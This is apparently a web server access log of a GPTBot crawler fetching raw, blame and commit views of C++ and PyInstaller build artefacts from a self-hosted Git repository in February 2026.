"/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:04:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:04:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:04:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9972] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9968] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:04:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:04:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14297] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:04:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20383] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:04:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11101] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:04:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14298] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:04:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:04:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11101] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14640] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:04:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9973] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:04:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51202] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:04:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 9887] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PKG-00.toc" -[17/Feb/2026:15:04:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14306] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:04:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:04:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:04:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:04:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14304] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:04:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10022] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10024] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:04:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:04:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20385] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:04:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:04:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:04:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:04:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:04:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:04:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:04:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 31658] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PKG-00.toc" -[17/Feb/2026:15:04:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 26684] [Gzip 20.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PKG-00.toc" -[17/Feb/2026:15:04:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 33397] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/EXE-00.toc" -[17/Feb/2026:15:04:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16186] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build" -[17/Feb/2026:15:04:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:04:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16919] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:04:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 78610] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.toc" -[17/Feb/2026:15:04:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" [Client 74.7.227.38] [Length 9925] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" -[17/Feb/2026:15:04:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 40929] [Gzip 14.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" -[17/Feb/2026:15:04:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 9885] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz" -[17/Feb/2026:15:04:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 9910] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PKG-00.toc" -[17/Feb/2026:15:04:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 53422] [Gzip 27.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.toc" -[17/Feb/2026:15:04:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 28010] [Gzip 20.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/EXE-00.toc" -[17/Feb/2026:15:04:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr 